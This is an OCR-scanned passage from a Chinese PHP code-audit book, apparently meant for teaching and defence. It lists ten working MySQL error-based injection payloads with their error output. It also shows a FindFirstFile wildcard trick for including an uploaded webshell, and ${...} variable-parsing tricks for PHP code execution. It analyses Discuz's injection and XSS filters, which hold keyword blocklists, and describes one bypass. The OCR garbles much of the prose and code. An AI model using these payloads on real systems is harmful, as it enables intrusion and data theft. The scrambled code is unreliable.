利用 数据 库 报错 来 显示 数据 的 注入 方式 经 常会 在 入 侵 中 利用 到 ， 这 种 方法 有 一 点 局 限 性 ， 需 要 页 面 有 错误 回 显 。 而 在 代码 审计 中 ， 经 常会 遇 到 没有 正常 数据 回 显 的 SQL 注入 漏洞 ， 这 时 候 我 们 就 需要 用 
报错 注入 的 方式 最 快 地 拿 到 注入 的 数据 。 


早 在 很 久 以 前 就 用 到 的 数据 类 型 转换 报错 是 用 得 最 多 的 一 种 方式 ， 这 种 方式 大 多 用 在 微软 的 SQL Server 上 ， 利 用 的 是 convert () 和 cast () 函数 ，MySQL 的 报错 SQL 注入 方式 更 多 ， 不 过 多 数 人 以 为 
只 有 三 种 ,分 别 是 floor () 、updatexml () 以 及 extractvalue () 这 三 个 国 数 ， 但 实际 上 还 有 很 多 个 国 数 都 会 导致 MySQL 报 错 并 且 显 示 出 数据 ， 它 们 分 别 是 GeometryCollection () 、polygon () 、 
GTID SUBSET () , multipoint () 、multilinestring () 、multipolygon () 、LINESTRING () 、exp OQ ， 下 面 我们 来 看 看 它们 具体 的 报错 用 法 ， 需 要 注意 的 一 点 是 ， 这 些 方 法 并 不 是 在 所 有 版 本 都 
通用 ， 也 有 比较 老 的 版 本 没有 这 些 函 数 。 


通常 注入 的 SQL 语句 大 多 是 "select*from phpsec where id=? ”这 种 类 型 ， 这 里 我 们 就 用 这 种 形式 来 说 明 人 怎么 利用 ， 利 用 方式 分 别 如 下 。 
第 一 种 : floor () 


注入 语句 : 





id=1 and (select 1 from (select count (*) , concat (user () , floor (rand (0) *2) ) x from information schema.tables group by x) a) 





SQL 语句 执行 后 返回 的 错误 信息 如 图 8-10 所 示 。 


SELECT 

count (*), 

concat(USER(), floor(rand(0) * 2)) x 
FROM 

information schema. TABLES 
GROUP BY 


[SOL]select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information schema.tables group by x)a; 
[Err] 1062 - Duplicate entry ‘root@localhostl' for key 'group key' 





图 8-10 
通过 截图 我 们 可 以 看 到 MySQL 出 现 了 报错 ， 并 且 显 示 出 了 当前 的 连接 用 户 名 。 
第 二 种 : extractvalue () 
注入 语句 : 


id = 1 and (extractvalue (1, concat (0x5c, (select user () ) ) ) ) 





错误 信息 如 图 8-11 所 示 。 
第 三 种 : updatexml () 
注入 语句 : 


id = 1 AND (updatexml (1, concat (0x5e24, (select user () ) , 0x5e24) , 1) ) 





userinfo 
WHERE 
id = 1 
HAND ( 
extractvalue ( 
i, 
concat (O0x5c, (SELECT USER())) 


[SOL]select * from userinfo where id = 1 and (extractvalue(1, concat(Ox5c, (select user())))) 


[Err] 1105 - XPATH syntax error: \root@localhost' 





图 8-11 


着 误 信息 : 


[Err] 1105 - XPATH syntax error:  '^$rootülocalhost^S$' 





第 四 种 : GeometryCollection () 


注入 语句 : 





id = 1 AND GeometryCollection ( (select * from (select * from (select user () ) a) b) ) 


错误 信息 : 











[Err] 1367 - Illegal non geometric ' (select `b`.`user () ^ from (select 'root@localhost' AS “user () ^ from dual) ^b^) ' value found during parsing 








第 五 种 : polygon () 


注入 语句 : 





id = 1 AND polygon ( (select * from (select * from (select user () ) a) b) ) 








普 误 信息 : 











[Err] 1367 - Illegal non geometric ' (select `b .user () ^ from (select 'root@localhost' AS “user () ^ from dual) ^b^) ' value found during parsing 








第 六 种 : multipoint () 


注入 语句 : 


id = 1 AND multipoint ( (select * from (select * from (select user () ) a) b) ) 











着 误 信息 : 














[Err] 1367 - Illegal non geometric ' (select `b .user () ^ from (select 'root@localhost' AS “user () ^ from dual) ^b^) ' value found during parsing 





第 七 种 : multilinestring () 


注入 语句 : 





id = 1 AND multilinestring ( (select * from (select * from (select user () ) a) b) ) 





错误 信息 : 














[Err] 1367 - Illegal non geometric ' (select `b .user () ^ from (select 'root@localhost' AS "user () ^ from dual) `b`ò) ' value found during parsing 





第 八 种 : multipolygon () 


注入 语句 : 





id = 1 AND multipolygon ( (select * from (select * from (select user () ) a) b) ) 








错误 信息 : 











[Err] 1367 - Illegal non geometric ' (select `b .user () ^ from (select 'root@localhost' AS “user () ^ from dual) `b`ò) ' value found during parsing 








第 九 种 : linestring () 


注入 语句 : 





id = 1 AND LINESTRING ( (select * from (select * from (select user () ) a) b) ) 



































ARs: 

[Err] 1367 - Illegal non geometric ' (select `b .user () ^ from (select 'root@localhost' AS “user () ^ from dual) `b`ò) ' value found during parsing 
第 十 种 : exp () 

注入 语句 : 




















id = 1 and EXP (~ (SELECT*from (SELECT user () ) a) ) 


着 误 信息 : 




















[Err] 1690 - DOUBLE value is out of range in 'exp (~ ( (select 'root@localhost' from dual) ) ) ' 


8.8 Windows FindFirstFile 利 用 


目前 大 多 数 程序 都 会 对 上 传 的 文件 名 加 入 时 间 戳 等 字符 再 进行 MD5， 然 后 下 载 文件 的 时 候 通过 保存 在 数据 库 里 的 文件 ID 读 取出 文件 路 径 ， 一 样 也 实现 了 文件 下 载 ， 这 样 我 们 就 无 法 直接 得 到 我 们 上 传 的 
webshell 文 件 路 径 ， 但 是 当 在 Windows 下 时 ， 我 们 只 需要 知道 文件 所 在 目录 ， 然 后 利用 Windows 的 特性 就 可 以 访问 到 文件 ， 这 是 因为 Windows 在 搜索 文件 的 时 候 使 用 到 了 FindFirstFile 这 一 个 winap 衣 
数 ， 该 函数 到 一 个 文件 夹 (包括 子 文件 夹 ) 去 搜索 指定 文件 。 


利用 方法 很 简单 ， 我 们 只 要 将 文件 名 不 可 知 部 分 之 后 的 字符 用 “<” 或 者 “>” 代 蔡 即 可 ， 不 过 要 注意 的 一 点 是 ， 只 使 用 一 个 “< ”或 者 “>” 则 只 能 代表 一 个 字符 ， 如 果 文 件 名 是 12345 或 者 更 长 ， 这 
时 候 请 求 “1<” 或 者 “1>” 都 是 访问 不 到 文件 的 ， 需 要 “1<<” 才 能 访问 到 ， 代 表 继 续 往 下 搜索 ， 有 点 像 Windows 的 短文 件 名 ， 这 样 我 们 还 可 以 通过 这 个 方式 来 爆破 目录 文件 了 。 我 们 来 做 个 简单 的 测 
试 ， 测 试 代码 如 下 : 

//1.php 


<? php 
include ($ GET['file']) ; 





再 在 同 目录 下 新 建 一 个 文件 名 为 “123456.txt” 的 文件 ， 内 容 为 phpinfo () 函数 ， 请 求 /1.php? file=1< < 即 可 包含 ， 效 果 如 图 8-12 所 示 。 


HHA 8E) 23S) WAV) “格式 (M) BS B&M) 


oci se l&| 4 i| a C| - 


f on e localhost/test/1.php ?filez 12 « « 


<?php 
include($ GET['file']); 





T> 








图 8-12 
通过 上 面 的 截图 我 们 可 以 看 到 成 功 包含 了 123456.txt 文 件 。 


这 里 我 们 要 想 ， 什 么 情况 下 才能 利用 这 个 特性 ? 目前 所 有 PHP 版 本 都 可 用 ，PHP 并 没有 在 语言 层面 禁止 使 用 >、 < 这些 特殊 字符 ， 在 遂 数 层面 来 讲 ， 这 个 特性 并 不 是 只 有 include () 、require () 这 些 
文件 包含 函数 或 者 file_get_contents () 这 类 文件 读 取 函数 才 可 用 ， 事 实 上 还 有 很 多 个 函数 也 一 样 是 可 用 这 个 特性 的 ， 参 见 表 8-2。 


表 82 


include() file put contents() 写 人 文件 


include once() 


创建 文件 夹 

move uploaded file() 移动 文件 
file get contents() ise BO f 文件 夹 操 作 
parse ini file() BERICHT 3c [4 e Bee 
readfile() Hop | 


89 ”PHP 可 变 变 量 


require( ) 
require once() 
fopen( ) 


ziparchive::open() 





PHP 可 变 变 量 指 的 一 个 变量 的 变量 名 可 以 动态 地 设置 和 使 用 ， 是 PHP 语 言 的 一 种 特性 ， 这 个 特性 让 我 们 在 操作 变量 的 时 候 更 加 灵活 方便 ， 但 是 同时 也 带 来 一 些 安全 问题 ， 我 们 在 挖掘 到 代码 执行 漏洞 的 
时 候 就 经 党 需要 用 到 可 变 变量 来 执行 代码 。 


我 们 先 用 一 段 代 码 来 理解 什么 是 可 变 变量 ， 代 码 如 下 : 


«? php 
Sa='seay'; 
$$a-'123'; 
echo $seay; ? > 


在 这 段 代码 中 ， 我 们 并 没有 直接 定义 $seay 变 量 ， 但 是 我 们 来 看 看 最 终 的 输出 yseay 的 结果 是 多 少 ， 如 图 8-13 所 示 。 


€ | 1277001/test/1.php | X^ #30 229 WAV 
pat TAPIS El e al «sje | ek s 
= © SQL- XSS- Encryption] |— z 


G9 LoadURL http://127.0.0.1/test/1.php 
T Split URL 



































did $$a-'123' 
I] Enable Post data |T| Eng E 





echo Sseay; 
22 




















Ej 8-13 
从 截图 中 可 以 看 到 ， 输 出 变量 $seay 的 值 为 “123”， 这 个 123 是 在 $$a 赋 值 的 ， 这 时 候 $a 被 赋值 了 "seay"， 而 $$a 就 相当 于 $ seay 。 


部 分 PHP 应 用 在 bini olm () 函数 第 二 个 参数 赋值 变量 时 ， 会 用 到 双 引 号 C) 来 代表 string 类 型 给 变量 赋值 ， 在 PHP 语 言 中 ， 单 引号 和 双 引 号 是 有 区 别 的 ， 单 引号 代表 纯 字 符 
串 ， 而 双 引 号 则 是 会 解析 中 间 的 变量 ， 所 以 当 使 用 双 引 号 时 会 存在 代码 执行 漏洞 ， 我 们 来 看 一 个 测试 ， 代 码 如 下 : 





«? php 
Sa="${@phpinfo () )"; ? > 





当 运 行 这 段 代码 时 ，phpinfo () 函数 会 成 功 执行 ， 输 出 内 容 如 图 8-14 所 示 。 






























































Bu >be d hl Deal m4 i 


€ @ Lescol cack st) itis. 


























Ej 8-14 
这 里 有 一 个 地 方 需要 注意 ， 代 码 ${@phpinfo () } 中 的 “@ ”符号 是 必须 存在 的 ， 不 然 就 无 法 执行 ， 但 是 除了 “@” 符号 还 有 其 他 的 写法 也 一 样 可 以 ， 只 要 不 影响 PHP 规 范 均 可 执行 ， 举 例如 下 : 


1) 人 花 括号 内 第 一 个 字符 为 空格 : 








Sa = "S{ phpinfo () }"; 


2) 人 花 括号 内 第 一 个 字符 为 TAB: 





$a = "S( phpinfo () }"; 


3) 人 花 括号 内 第 一 个 字符 为 注释 符 : 





$a = "S{/**/phpinfo () }"; 
4) 人 花 括 号 内 第 一 个 字符 为 回 车 换行 符 : 


$a = "S{ 
phpinfo () }"; 








5) 花 括号 内 第 一 个 字符 为 加 号 (+) : 





$a = "S{+phpinfo () }"; 





6) 花 括号 内 第 一 个 字符 为 减 号 C): 








Sa = "S{-phpinfo () }"; 


7) 花 括 号 内 第 一 个 字符 为 感叹 号 (! ) : 





$a = "${! phpinfo () }"; 


除了 这 些 之 外 还 有 一 些 如 ~、\ 等 。 


三 部 分 “PHP 安全 编程 规范 


这 一 部 分 主要 介绍 PHP 安 全 编程 的 规范 ， 从 攻击 者 的 角度 来 告诉 你 应 该 怎么 做 才能 写 出 更 安全 的 代码 ， 这 也 是 本 书 期 望 达 到 的 目标 : 让 代码 没有 漏洞 。 这 部 分 包括 第 9、10、11 章 ， 第 9 章 主要 介绍 参数 
的 安全 过 滤 ， 所 有 的 攻击 都 需要 有 输入 ， 所 以 我 们 要 阻止 攻击 ， 第 一 件 要 做 的 事情 就 是 对 输入 的 参数 进行 过 滤 ， 该 章 详细 分 析 discuz 的 过 滤 类 ， 用 实例 说 明 什 么 样 的 过 滤 更 有 效果 。 


第 10 章 主要 介绍 PHP 中 常用 的 加 密 算法 ， 目 前 99% 以 上 的 知名 网 站 都 被 拖 过 库 ， 泄 露 了 大 量 的 用 户 数据 ， 而 在 这 一 章 ， 我 们 将 详细 说 明 使 用 什么 样 的 加 密 算法 能 够 帮助 你 增强 数据 的 安全 性 。 


第 11 章 是 安全 编程 比较 核心 的 一 章 ， 所 有 应 用 都 是 一 个 个 功能 堆砌 起 来 的 ， 我 们 在 这 章 从 攻击 者 的 角度 详细 分 析 常 见 功能 会 出 现 哪些 安全 问题 ， 在 分 析出 这 些 安全 问题 的 利用 方式 后 ， 再 给 出 问题 的 解 
决 方案 ， 如 果 你 是 应 用 架构 师 ， 这 些 能 够 帮助 你 在 设计 程序 功能 时 避免 这 些 安全 问题 。 


第 9 草 ”参数 的 安全 过 渡 


所 有 对 Web 应 用 的 攻击 都 要 传 入 /有害 的 参数 ， 因 此 代码 安全 的 基础 就 是 对 传 入 的 参数 进行 有 效 的 过 滤 ， 比 如 像 SQL 注 入 漏洞 ， 只 要 过 滤 到 单 引号 ， 就 能 防御 住 大 部 分 的 string 类 型 的 SQL 注入 ， 只 要 过 滤 
掉 尖 括号 和 单 双 引 号 也 能 过 渡 掉 不 少 XSS 漏 洞 ， 这 种 简单 的 过 渡 跟 完全 不 过 滤 带 来 的 效果 是 天 壤 之 别 ， 我 们 做 的 就 是 要 细 化 这 些 过 渡 规 则 ， 通 过 横向 扩展 防御 策略 来 拦截 更 多 的 攻击 ,不 少 第 三 方 提供 了 这 
样 的 过 滤 函 数 和 类 ， 我 们 可 以 直接 引用 ， 另 外 PHP 自 身 提 供 了 不 少 过 滤 的 函数 ， 好 好 使 用 这 些 内 置 的 函数 也 能 达到 非常 好 的 效果 。 
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在 一 些 中 小 型 的 Web 应 用 程序 中 ， 由 于 大 多 数 开发 者 是 不 怎么 


第 三 方 过 


VERR 


么 懂 安 全 的 ， 所 以 都 会 选择 一 些 第 三 方 的 过 


过 ; e ER] 


出 名 的 有 出 自 80sec 团 队 给 出 的 一 个 SQL 注入 过 滤 的 类 ， 在 国内 大 大 小 小 的 程序 像 discuz、dedecms、phpmywind 等 都 使 用 过 


目前 大 多 





foreach (Array (' | 


GET' 





d 





foreach ($$ request 
{ 























数 应 用 都 有 一 个 参数 过 


才 滤 的 统一 入 口 ， 














' POST', ' COOKIE!) 


as $ k => $ v) 


类 似 于 dedecms 的 代码 ， 如 下 所 示 : 


as $ request) 





if ($ k == 'nvarname') ${$ k) = $ v; 
else $($ k} = RunMagicQuotes ($ v) ; 
} 
跟 进 RunMagicQuotes () 函数 之 后 的 代码 如 下 : 
function RunMagicQuotes (&$svar) 
if (! get magic quotes gpc () ) 
| if ( is array ($svar) ) 
foreach ($svar as $ k => $ v) Ssvar[$_k] 
ave 
| if (strlen ($svar) >0&& preg match ('#* (cfg |GLOBALS| G 


) 


而 这 里 仅 仪 是 使 用 addslashes () 


9.1.1 


discuz 全 称 Crossday Discuz! Board, 
discuz 一 直 是 众多 安全 爱好 者 重点 研究 的 对 象 ， 所 以 也 被 公布 过 


+ 


discuz 在 专门 有 一 个 SQL 注 入 过 


{ 
exit ('Request 
} 


var not allow! ') ; 


$svar = addslashes ($svar) ; 


} 
} 


return Ssvar; 


discuz SQL 安全 过 滤 类 


分 析 


滤 类 来 过 


函数 过 滤 ， 确 实 能 


防御 住 一 部 分 


寺 滤 SQL 注 入 请 求 ， 不 过 也 出 现 了 多 次 





不 少 的 安全 漏洞 。 


 RunMagicQuotes ($ v) ; 





ET| POST| COOKI 


E) $', 


Ssvar) ) 


绕 过 的 情况 ， 下 面 我 们 来 分 析 它 的 这 个 SQL 注 入 过 


首先 我 们 先 看 到 discuz 的 配置 文件 /config/config_global.php 中 的 “CONFIG SECURITY” 部 分 内 容 ， 如 下 : 




















都 是 SQL 注 入 过 








// w———————————— 9 CONFIG SECURITY -------------------------- // 
$ config['security']['authkey'] = '3ca530iluCe7lRke 

$ config['security']['urlxssdefend'] = 1; 

$ contigl security’ ]['attackevasive' ] = '0'; 

$ config['security']['querysafe'][|'status'] = 1; // 是 否 开启 SQL 注入 防御 
[PAF RSL ALM 

$ config['security']['querysafe']['dfunction']['0'] = 'load file'; 

$ config['security'l['querysate']['dfunection']['1'] = "hex"; 

$ config['security']['querysafe']['dfunction']['2'] = 'substring'; 

$ eonfig['security']['qguerysafe']['dfunction'][|'3'] = 'if'; 

$ config['security']['querysafe']['dfunction']['4'] = 'ord'; 

$ config['security']['querysafe']['dfunction']['5'] = 'char'; 

$ config['security'] ['querysafe'] ['daction']['0'] = '@'; 

$ config['security']['querysafe']['daction']|'l'] = 'intooutfile'; 

$ contig['security']['querysafe']['daction'][|'2'] = 'intodumpfile'; 
$ config['security']['querysafe']['daction']['3'] = 'unionselect'; 

$ config['security']['querysafe']['daction']['4'] = ' (select'; 

$ config['security']['querysafe']['daction']['5'] = 'unionall'; 

$ config['security']['querysafe']['daction']['6'] = 'uniondistinct'; 
$ config['security']['querysafe']['dnote']['0'] = '/*'; 

$ config[ 'security']['querysafe']['dnote']['1'] = '*/'; 

$ config['security']['querysafe']['dnote']['2'] = '4'; 

$ contig['security']['querysafe']['dnote']['3'] = "=="; 

$ config['security']['querysafe']['dnote']['4'] = '"' 

$ config['security']['querysafe']['dlikehex'] - 1; 

$ config['security']['querysafe']['afullnote'] = '0'; 

















根据 笔者 的 标注 (上面 加 粗 代码 ) 





$ confi 


滤 类 的 过 


Discuz 执 行 SQL 语句 之 前 会 调用 \sourceNclass\discuzN\discuz database.php 文 件 discuz database safecheck 类 下 面 的 checkquery ($sql) 





Public static 
} 












































g['security']['querysaf 


function checkquery ($sql) 

















e']['daction'] 











(if 
































YRS confi 


寺 渡 规则 ， 规 则 里 包含 了 常见 的 注入 关键 字 。 








(self: : $conf 








g['security']['querysafe 


ig === null) 


， 我 们 可 以 看 到 discuz 配 置 文件 中 可 以 设置 是 否 开启 SQL 注入 防御 ， 





( self: 





: Sconf 


从 代码 中 可 以 看 到 ， tc nee 根据 $config['status'] 判 断 SQL 注 入 防御 是 


























'J['anote'] 





—_> 


yx 


个 选项 默认 开启 ， 
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FAS aI RBS do query safe () 函数 对 SQL 语句 进行 过 滤 ， 我 们 继续 跟 进 do query safe () 函数 ， 代 码 如 下 : 
private static function do query safe ($sql) { 
Psql = str replace (array (C NANI “ANAT, TAME AN AL T Sealy 3 
Smark = Sclean = ''; 
if (strpos ($sql, '/') === false && strpos ($sql, '#') === false && strpos ($sql, '-- 
} else { Slen = strlen ($sql) ; Smark = Sclean = ''; for ($i = 0; $i < $len; $i++) 
if (strpos ($clean, '@') ! == false) { 
return '-3'; 
} 
Sclean = preg_r place ("/[^a-z0-9 N-N A) #\*\/\"]+/is", "", strtolower (Sclean) ) ; 


i 


E 














f (self: : Sconfig['a 








$clean = str rep] 





(is array (self: 





: $con 


Fullnote']) { 
lace ('/**/', Y 


', Sclean) ; 








Fig['df 














foreach (self: 


: Sconfi 





g['dfunc 


tion'] 








if 


(strpos ($clean, 





fun . 


"(9 


unction' 


19.9 
as $1 


| == 





Fun) 





false && strpos ($sql, 
{ $str = $sql[$i]; 


函数 或 者 类 ， 直 接 拿 过 去 套 着 用 ， 并 不 知道 


漏洞， 但 是 对 特定 的 场景 和 漏洞 就 不 那么 好 使 了 。 所 以 除了 总 入 口 ， 在 具体 的 功 全 


才 滤 的 类 


'Q') 
switch (Sstr) 


函数 进 


ANRE 由 底 怎么 样 。 在 PHP 安 全 过 


8 点 也 需要 进行 


pA 


ig = getglobal ('config/security/querysafe') ; }if 


否 开启 ， 再 到 $check=self: : 


{ 





行 过 滤 ， 我 们 来 跟 进 这 


(self: 


本 一 些 过 Wiz. 


一 般 不 会 有 管理 员 去 关闭 ， 再 往 下 的 内 容 : 








false && strpos ($sql, 


Case 


_do query safe ($sql) 





if 


个 





: $config['status']) 


(! Smark) ( 


才 滤 的 类 里 面 ， 比 较 


是 康 盛 创 想 (北京 ) 科技 有 限 公司 ipM 推出 的 一 套 开源 通用 的 社区 论坛 软件 系统 ， 使 用 PHP + MySQL 开 发 ， 现 已 被 腾讯 收购 ， 由 于 用 户 量 巨 
过 数 年 的 沉淀 ， 如 今 的 discuz 主 程序 在 代码 安全 方面 已 经 做 得 比较 成 熟 。 


函数 看 看 ， 代 码 如 下 : 


{ Scheck 


; 可 以 看 到 该 函数 又 调 


Nu 





false) { 
S$marl 














return '-1'; 
} 
} 
if (is array (self: : $config['daction']) ) { 
foreach (self: : $config['daction'] as $action) { 
if (strpos ($clean, $action) ! == false) 





return '-3'; 


} 





if (self: : $config['dlikehex'] && strpos ($clean, 'likeOx') ) { 
return '-2'; 
} 
i 














if (is array (self: : $config['dnote']) ) { 
foreach (self: : $config['dnote'] as $note) { 
if (strpos ($clean, $note) ! == false) 








return '-4'; 


) 


return 1; 


JL ERES TRILUE SU, RSS SCA: 


$sql = str replace: (array (NAN TAW n NM NT Vfs Seals 


将 SQL 语 句 中 的 N\、\、\" 以 及 "替换 为 空 ， 紧 接着 是 一 个 if else 判 断 逻 辑 来 选择 过 滤 的 方式 : 




















if (strpos ($sql, '/') === false && strpos ($sql, '#') === false && strpos ($sql, '-- ') === false && strpos ($sql, '@') === false && strpos ($sql, '`') === false) | 
$clean = preg replace ("/' (.+? ) '/s", '', $sql) ; 
} else { 


这 段 代 码 表示 当 SQL 语 句 里 存在 /、#、'--…、'@'、 ”这些 字符 时 ， 则 直接 调用 preg_replace () 函数 将 单 引号 (C) 中 间 的 内 容 蔡 换 为 空 ， 这 里 之 前 存在 一 个 绕 过 ， 只 要 把 SQL 注入 的 语句 放 到 单 引 号 中 


间 ， 则 会 被 著 换 为 空 ， 进 行 下 面 再 判断 的 时 候 已 经 检测 不 到 SQL 注入 的 关键 字 ， 导 致 绕 过 的 出 现 ， 在 MySQL 中 使 用 @ ”代表 null，SQL 语 句 可 以 正常 执行 。 


- 


else 条 件 中 是 对 整 段 SQL 语 句 进行 逐个 字符 进行 判断 ， 比 如 











case '/': 
if (empty (Smark) && $sql[$i + 1] == '*') { 
Smark = '/*'; 
Sclean .= Smark; 
Sitt; 
} elseif (Smark == '/*' && Ssql[$i- 1] == '*') { 
Smark = ''; 
Sclean .= '*'; 
} 
break; 


这 段 代码 的 逻辑 是 ， 当 检查 到 SQL 语句 中 存在 斜 杠 (/) 时 ， 则 去 判断 下 一 个 字符 是 不 是 星 号 C) ， 如 果 是 星 号 C) 就 把 这 两 个 字符 拼接 起 来 ， 即 /*， 然 后 继续 判断 下 一 个 字符 是 不 是 星 号 (*) WR 
是 星 号 则 再 继续 拼接 起 来 ， 得 到 /*， 最 后 在 如 下 代码 中 判断 是 否 存 在 原来 拦截 规则 里 面 定 义 的 字符 ， 如 果 存 在 则 拦截 SQL 语 句 执行 : 








if (is array (self: : $config['dnote']) ) { 

foreach (self: : $config['dnote'] as $note) { 
if (strpos ($clean, Snote) ! == false) 
return '-4'; 


} 














国内 知名 的 多 款 cms 应 用 如 dedecms 等 ， 都 有 使 用 类 似 这 个 过 滤 类 ， 另 外 由 于 应 用 的 基础 架构 不 一 样 ， 这 个 过 滤 类 应 用 起 来 的 实际 效果 也 各 不 太一 样 ，discuz 目 前 做 得 相对 较 好 。 
9.1.2. discuz XSS 标 签 过 滤 函 数 分 析 


目前 大 多 数 XSs 过 滤 都 是 基于 黑 名 单 的 形式 ， 编 程 语 言 和 编码 结合 起 来 干 变 万 化， 基于 黑 名单 的 过 滤 总 给 人 不 靠 谱 的 感觉 ， 事 实 确实 是 这 样 ， 目 前 好 像 还 没有 看 到 基于 黑 名 单 过 滤 的 规则 一 直 没 有 被 绕 
过 ， 其 实在 XSs 的 防御 上 ， 只 要 过 滤 掉 尖 括号 以 及 单 、 双 引号 就 能 干掉 绝 大 部 分 的 payload。 下 面 我 们 来 看 看 discuz 的 HTML 标 签 过 滤 代 码 ， 如 下 所 示 : 
function checkhtml ($html) { 


if (! checkperm ('allowhtml') ) { 
preg match all ("/\< ([*\<]+) \>/is", Shtml, $ms) ; 




















$searchs[] = '<'; 
Sreplaces[] = '&lt; '; 
Ssearchs[] = '>'; 
Sreplaces[] = '&gt; '; 





if ($ms[1]) { 






































































































































Sallowtags = 'img|a|font|div|table|tbody|caption|tr|td|th|br|p|b|strongli|u|em|span|ol|ul|li|blockquote|object|param'; 

$ms[1] = array unique ($ms[1]) ; 

foreach (Sms[1] as $value) 1 

Ssearchs[] = "lt; ".Svalue."&gt; "5 

Svalue = str_replace ('&', ' uch tmp str ', $value) ; 

Svalue = dhtmlspecialchars (Svalue) ; 

$value = str replace (' uch tmp str ', '&', $value) ; 

$value = str replace (array ('\\', '/*') , array ('.', '/.') , $value) ; 

$skipkeys = array ('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut',  'onbeforedeactivate', 
'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 
'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 
'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 
'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 

'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 
'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 
'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted',  'onscroll', 'onselect', 'onselectionchange', 'onselectstart',  'onstart', 'onstop', 
'onsubmit', 'onunload', 'javascript', 'script', 'eval', 'behaviour', 'expression', 'style', 'class') ; 

Sskipstr = implode ('|', Sskipkeys) ; 

$value = preg replace (array ("/ ($skipstr) /i") , '.', $value) ; 

if (! preg match ("/*[\/|\s]? (S$allowtags) (Ns*|$) /is", $value) ) { $value = ''; } 

Sreplaces[] = empty ($value) ? '': "«".str replace ('&quot; ', '"', $value) .">"; 


} } $html = str replace ($searchs, Sreplaces, $html) ; }return $html; 


从 代码 中 可 以 看 到 ， 这 里 首先 定义 了 一 条 正则 取出 来 尖 括 号 中 间 的 内 容 : 


preg match all ("/\< ([*\<]+) \>/is", $html, Sms) ; 


然后 在 if ($ms[1]) 这 个 if 条 件 里 对 这 些 标签 中 的 关键 字 进 行 筛选 ，$skipkeys 变 量 定义 了 很 多 on 事件 的 敏感 字符 ， 如 下 代码 中 可 以 看 到 ， 最 后 拼接 正则 将 这 些 字 符 串 替换 掉 : 


Sskipstr = implode ('|', Sskipkeys) ; 
value = preg replace (array ("/ (Sskipstr) /i") , '.', $value) ; 





d. 2 内 置 过 滤 he Ls] eK ES 

PHP 本 身 内 置 了 很 多 参数 过 滤 的 函数 ， 以 方便 开发 者 简单 有 效 且 统一 地 进行 安全 防护 ， 而 这 些 函 数 可 以 分 为 多 种 类 型 ， 如 SQL 注入 过 滤 函 数 、XsS 过 滤 孙 数 、 命 令 执行 过 滤 国 数 、 代 码 执 行 过滤 函 数 ， 等 
等 ， 下 面 我 们 来 看 看 这 些 函 数 的 用 法 。 

1.SQL 注 入 过 滤 函 数 


SQL 注入 过 滤 国 数 有 addslashes () . mysql real escape string () 以 及 mysql_escape_string () ， 它 们 的 作用 都 是 给 字符 串 添加 反 斜 杠 (V) 来 转 义 掉 单 引号 () 、 双 引号 C) 、 反 和 斜 线 (\) 以 
及 空 字符 NULL。addslashes () 和 mysql_escape_string () 函数 都 是 直接 在 敏感 字符 串 前 加 反 斜 枉 ， 这 里 可 能 会 存在 绕 过 宽 字 节 注 入 绕 过 的 问题 ， 而 mysql_real escape string () 函数 会 考虑 当前 连接 
数据 库 的 字符 集 编码 ， 安 全 性 更 好 ， 推 荐 使 用 。 


2.XSS 过 滤 函 数 


XSS 过 滤 函 数 有 htmlspecialchars () 和 strip_ tags () ， 这 两 个 国 数 的 功能 大 不 一 样 ，htmlspecialchars () 函数 的 作用 是 将 字符 串 中 的 特殊 字符 转换 成 HTML 实 体 编 码 ， 如 公转 换 成 &amp; , "转换 
Bk&quot; , 转换 成 &#039; ，< 转 换 成 &It; ，> 转 换 成 &gt; 这 个 函数 简单 粗暴 但 是 却 非常 有 效果 ， 已 经 能 干掉 大 多 数 的 XSS 攻 击 。 


而 strip_ tags () 函数 则 是 用 来 去 掉 HTML 及 PHP 标 记 ， 比 如 给 这 个 函数 传 入 “<h1>xxxxx</h1>”， 经 过 它 处 理 后 返回 的 字符 串 为 xxxxx。 
3. 命 令 执行 过 滤 函 数 


BERITA? nm PHP 为 了 防止 系统 命令 注入 的 漏洞 ， 提 供 了 escapeshellcmd () 和 escapeshellarg () 两 个 函数 对 参数 进行 过 滤 ，escapeshellcmd () & 
数 过 滤 的 字符 为 '&'、 、 和 "WXOA'、"\xXFF'、“”% ”以 及 单 双 引 号 ，Windows 下 过 渡 方 式 则 是 在 这 些 字符 前 面 加 了 一 个 人 ^ 符 号 ， 而 
在 Linux 下 则 是 在 这 些 字符 前 面 加 了 反 斜 杠 (X) . escapeshellarg () 函数 过 滤 方 式 比较 简单 ， 给 所 有 参数 加 上 一 对 双 引 号 ， 强 制 为 字符 串 。 


第 10 章 ”使 用 安全 的 加 密 算法 


加 密 是 指 将 明文 直接 可 见 的 数据 以 特定 的 算法 进行 混淆 ， 以 保证 数据 的 安全 掩蔽 性 。 加 密 一 直 是 一 个 很 热 的 话题 ， 在 密码 学 中 占 很 大 一 块 比 例 ， 目 前 常见 的 加 密 算法 可 以 分 为 对 称 加 密 、 非 对 称 加 密 以 
及 单 向 加 密 ( 哈 希 算法 ) ， 这 些 加 密 算法 大 量 运 用 在 各 种 系统 和 应 用 中 ， 最 常见 的 是 我 们 访问 使 用 HTTPS 的 网 站 流量 是 经 过 加 密 的 ， 密 码 保存 在 网 站 数据 库 中 大 多 也 是 经 过 MD5 或 者 DES 加 密 ， 而 通常 不 推 
荐 使 用 可 逆 的 加 密 算法 来 加 密 保存 用 户 登 录 密码 ， 因 为 黑客 在 拿 到 密 钥 的 情况 下 可 对 数据 进行 还 原 。 下 面 我 们 来 看 看 PHP 中 常用 的 加 解密 算法 的 实现 方式 。 


